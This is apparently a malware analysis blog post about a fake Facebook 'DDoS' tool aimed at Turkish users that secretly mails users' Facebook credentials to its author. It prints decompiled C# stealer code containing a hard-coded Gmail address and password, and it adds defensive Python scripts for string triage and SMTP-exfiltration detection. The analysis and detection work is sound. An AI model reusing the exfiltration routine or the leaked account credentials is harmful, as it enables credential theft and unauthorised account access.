Friday, October 13, 2017

Fake Facebook DDoS Malware – Actually a password stealer

Last month, security researchers discovered a Facebook password-stealer malware bundled with njRat. This month we got another piece of malware which claims that it can target a given profile and perform a DDoS attack. It is actually a password stealer, and it targets Turkish users.

Static Analysis of the sample (code analysis)
MD5: F7BED7CD45A98275470707E54976C009
File Type: 32-Bit Exe
Size: 845824 Byte(s)

Figure 1 CompilerDetect -> .NET
The malware is compiled with .NET, so we started with string and code analysis of the sample. When we looked into the strings, we found some very interesting details:

·         0000000CCA0D   0000004CE60D      0   Account Close
·         0000000CCA29   0000004CE629      0   CheckBox3
·         0000000CCA63   0000004CE663      0   ProgressBar1
·         0000000CCA7D   0000004CE67D      0   Label4
·         0000000CCADF   0000004CE6DF      0   $this.BackgroundImage
·         0000000CCB0B   0000004CE70B      0   $this.Icon
·         0000000CCB21   0000004CE721      0   FACEBOOK
·         0000000CCB33   0000004CE733      0   FACEBOOK KAPATMA 2017
·         0000000CCB5F   0000004CE75F      0   Login Successful Account will be closed within 5 minutes.
·         0000000CCBD3   0000004CE7D3      0   furkanbabalog(at)gmail.com
·         0000000CCC03   0000004CE803      0   smtp.gmail.com
·         0000000CCC21   0000004CE821      0   sanane123
·         0000000CCC35   0000004CE835      0   Facebook_Kapatma_2017.Resources
·         0000000CDB66   0000004D2166      0   VS_VERSION_INFO
·         0000000CDBC2   0000004D21C2      0   VarFileInfo
·         0000000CDBE2   0000004D21E2      0   Translation
·         0000000CDC06   0000004D2206      0   StringFileInfo
·         0000000CDC2A   0000004D222A      0   000004b0
·         0000000CDC42   0000004D2242      0   FileDescription
·         0000000CDC64   0000004D2264      0   Facebook Kapatma 2017
·         0000000CDC96   0000004D2296      0   FileVersion
·         0000000CDCB0   0000004D22B0      0   1.0.0.0
·         0000000CDCC6   0000004D22C6      0   InternalName
·         0000000CDCE0   0000004D22E0      0   Facebook Kapatma 2017.exe

The file description, resource details and e-mail credentials (highlighted in red) are found inside the sample. Using these credentials, we tried to log in to the mailbox in order to stop the theft, but Gmail blocked the attempt because the device was not recognised. It is probably a placeholder account for the attacker.

Figure 2 Gmail security asks for verification
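As an added triage example (not part of the original analysis), the following Python script reproduces the string-based spotting of the indicators above. It extracts both ASCII and UTF-16LE strings, because .NET user strings such as the message text and the SMTP settings are stored as UTF-16LE and a plain ASCII `strings` pass misses them, and it then flags any SMTP host that has an e-mail address nearby in the string table, which is the hard-coded-exfil-account pattern this sample shows. The byte blob is constructed to imitate the strings listed above and is not data from the real sample; the `(at)` form of the address follows the write-up's masking, so the regex accepts both `@` and `(at)`.

```python
import re

# Constructed stand-in for a slice of the sample's string data (not bytes from
# the real file): .NET user strings are UTF-16LE, the version-info name is
# given in ASCII for contrast. Addresses keep the write-up's "(at)" masking.
SAMPLE_BLOB = (
    b"\x00\x00MZ\x90\x00"
    + "Login Successful Account will be closed within 5 minutes.".encode("utf-16le") + b"\x00\x00"
    + "furkanbabalog(at)gmail.com".encode("utf-16le") + b"\x00\x00"
    + "smtp.gmail.com".encode("utf-16le") + b"\x00\x00"
    + "sanane123".encode("utf-16le") + b"\x00\x00"
    + b"Facebook Kapatma 2017.exe\x00"
)

MIN_LEN = 6  # minimum printable run, same idea as strings(1) -n 6


def extract_strings(data, min_len=MIN_LEN):
    """Return (encoding, offset, text) tuples for printable ASCII and UTF-16LE
    runs, sorted by offset so neighbouring strings stay neighbours."""
    found = []
    ascii_run = rb"[\x20-\x7e]{%d,}" % min_len
    utf16_run = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    for m in re.finditer(ascii_run, data):
        found.append(("ascii", m.start(), m.group().decode("ascii")))
    for m in re.finditer(utf16_run, data):
        found.append(("utf-16le", m.start(), m.group().decode("utf-16le")))
    return sorted(found, key=lambda t: t[1])


# Accepts both a real "@" and the "(at)" masking used in the write-up.
EMAIL_RE = re.compile(r"[\w.+-]+(?:@|\(at\))[\w-]+\.[\w.-]+", re.I)
SMTP_HOST_RE = re.compile(r"^(?:smtp|mail)\.[\w.-]+$", re.I)


def find_smtp_indicators(strings, window=4):
    """Flag an SMTP host string that has an e-mail address within `window`
    strings of it. A mail host, a mailbox and a short opaque token stored
    together is the fingerprint of a stealer with a hard-coded exfil account."""
    texts = [t for _, _, t in strings]
    hits = []
    for i, text in enumerate(texts):
        if not SMTP_HOST_RE.match(text):
            continue
        nearby = texts[max(0, i - window): i + window + 1]
        addresses = sorted({a for s in nearby for a in EMAIL_RE.findall(s)})
        if addresses:
            hits.append({"smtp_host": text, "addresses": addresses})
    return hits


if __name__ == "__main__":
    strs = extract_strings(SAMPLE_BLOB)
    for enc, off, text in strs:
        print(f"{off:08x} {enc:8s} {text}")
    for hit in find_smtp_indicators(strs):
        print("possible SMTP exfil account:", hit)
```

Run against a real file by replacing `SAMPLE_BLOB` with `open(path, "rb").read()`; the UTF-16LE pass is what surfaces the .NET string table entries seen in the listing above.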

The file resources contain a background image that looks like a hacker from a movie poster.

Figure 3 Background Image

Figure 4 Facebook Kapatma

‘Kapatma’ is a Turkish word meaning ‘close down’. The image above shows the classes found in the code. Inside the code we find the input field details, as seen in the checkbox and label text:
this.Label1.Text = "E-posta"; // E-posta means e-mail.
this.Label2.Text = "Şifre"; // Şifre means password.
this.CheckBox1.Text = "Ddos Attack";
this.Button1.Text = "Hesabı Kapat"; // Hesabı kapat means close account.
this.Label3.Text = "URL:";
this.CheckBox3.Text = "Complaint Attack\r\n";
this.Label4.Text = "NOT:Hesap 5Dakika İçerisinde Kapatılır ! "; // NOTE: the account will be closed within 5 minutes.
The purpose is to collect the Facebook credentials entered to log in to the tool; the URL field is the profile that is supposedly going to be attacked. Let us see how the collected details are transferred.
private void Button1_Click(object sender, EventArgs e)
{
    MailMessage mailMessage = new MailMessage();
    try
    {
        // Decoy message shown to the victim while the data is sent out.
        Interaction.MsgBox("Login Successful Account will be closed within 5 minutes.", MsgBoxStyle.OkOnly, null);
        // From and To are the same hard-coded attacker mailbox.
        mailMessage.From = new MailAddress("furkanbabalog(at)gmail.com");
        mailMessage.To.Add("furkanbabalog(at)gmail.com");
        // TextBox1 and TextBox2 hold the victim's input (the E-posta and Şifre fields).
        mailMessage.Subject = this.TextBox1.Text;
        mailMessage.Body = this.TextBox2.Text;
        new SmtpClient("smtp.gmail.com")
        {
            Port = 587,
            EnableSsl = true,
            Credentials = new NetworkCredential("furkanbabalog(at)gmail.com", "sanane123")
        }.Send(mailMessage);
    }
    catch (Exception)
    {
        // The catch block is not shown in the decompiled snippet; assumed empty.
    }
}
The above code snippet shows that the collected credentials are exfiltrated by e-mail: the tool logs in to the hard-coded Gmail account and sends the details to that same account, i.e. the From and To addresses are the same.

Behavioural analysis

We executed the sample in our controlled environment and observed that the file opens a GUI as follows:

Figure 5 GUI of the fake tool


We entered random text in the text boxes and selected all the checkboxes. Once we clicked the button, a message box appeared saying "Login Successful Account will be closed within 5 minutes."

Figure 6 Login successful message box


No file traces or registry traces are added after execution of this malware.
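Because the tool leaves no file or registry artefacts, the host-side signal worth alerting on is the one the code analysis above exposes: an outbound SMTP submission (TCP 587 to smtp.gmail.com) from a binary that is not a mail client. The following Python is an added detection example, not part of the original post; it runs over constructed connection events (not real telemetry) in the shape of a flattened Sysmon event ID 3 feed, and the mail-client allowlist, the webmail host list and the user-writable path list are assumptions for the example.

```python
# Constructed connection events, not real telemetry, in the shape of a
# flattened Sysmon event ID 3 / EDR network feed:
#   timestamp|process image|destination host|destination port|protocol
# 203.0.113.0/24 is a documentation range; the hosts here are made up.
EVENTS = """\
2017-10-13T10:01:02Z|C:\\Users\\lab\\Desktop\\Facebook Kapatma 2017.exe|smtp.gmail.com|587|tcp
2017-10-13T10:01:05Z|C:\\Program Files\\Mozilla Thunderbird\\thunderbird.exe|smtp.gmail.com|587|tcp
2017-10-13T10:02:11Z|C:\\Windows\\System32\\svchost.exe|203.0.113.10|443|tcp
2017-10-13T10:03:40Z|C:\\Users\\lab\\Downloads\\tool.exe|203.0.113.25|465|tcp
2017-10-13T10:04:00Z|C:\\Users\\lab\\Downloads\\tool.exe|203.0.113.25|53|udp
"""

MAIL_SUBMISSION_PORTS = {25, 465, 587}
# Assumed allowlist of processes expected to speak SMTP on an end-user host.
KNOWN_MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
# Public webmail submission host seen in the sample; extend per environment.
WEBMAIL_SMTP_HOSTS = {"smtp.gmail.com"}
# Path fragments (lower-cased) that mark a user-writable location.
USER_WRITABLE_DIRS = ("\\users\\", "\\appdata\\", "\\temp\\")


def parse_events(text):
    """Split the pipe-separated feed into dicts; ports become ints."""
    rows = []
    for line in text.strip().splitlines():
        ts, image, host, port, proto = line.split("|")
        rows.append({"ts": ts, "image": image, "host": host,
                     "port": int(port), "proto": proto})
    return rows


def smtp_from_unexpected_process(events):
    """Return (timestamp, exe, host, port, severity) for TCP connections to a
    mail submission port made by a process that is not a known mail client.
    Severity is 'high' when the binary lives in a user-writable path and talks
    to public webmail, which is what a freshly downloaded 'hacking tool' that
    mails the victim's input to a hard-coded mailbox looks like on the wire."""
    hits = []
    for ev in events:
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        if ev["proto"] != "tcp" or ev["port"] not in MAIL_SUBMISSION_PORTS:
            continue
        if exe in KNOWN_MAIL_CLIENTS:
            continue
        from_user_dir = any(d in ev["image"].lower() for d in USER_WRITABLE_DIRS)
        severity = "high" if from_user_dir and ev["host"] in WEBMAIL_SMTP_HOSTS else "medium"
        hits.append((ev["ts"], exe, ev["host"], ev["port"], severity))
    return hits


if __name__ == "__main__":
    for ts, exe, host, port, sev in smtp_from_unexpected_process(parse_events(EVENTS)):
        print(f"[{sev}] {ts} {exe} -> {host}:{port} (SMTP from non-mail process)")
```

The rule deliberately keys on the port and the process rather than on the mailbox address, since the address and password in the string table change from sample to sample while the delivery method does not.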

Conclusion:

We are seeing an emerging trend of Facebook hacking tools and DDoS tools that actually steal the tool user's own credentials rather than attacking the given target. It is high time to educate users that these tools are fake: they are password stealers, not hack or crack tools. In this case the tool targets Turkish users, and we may expect similar tools to appear in other parts of the world.
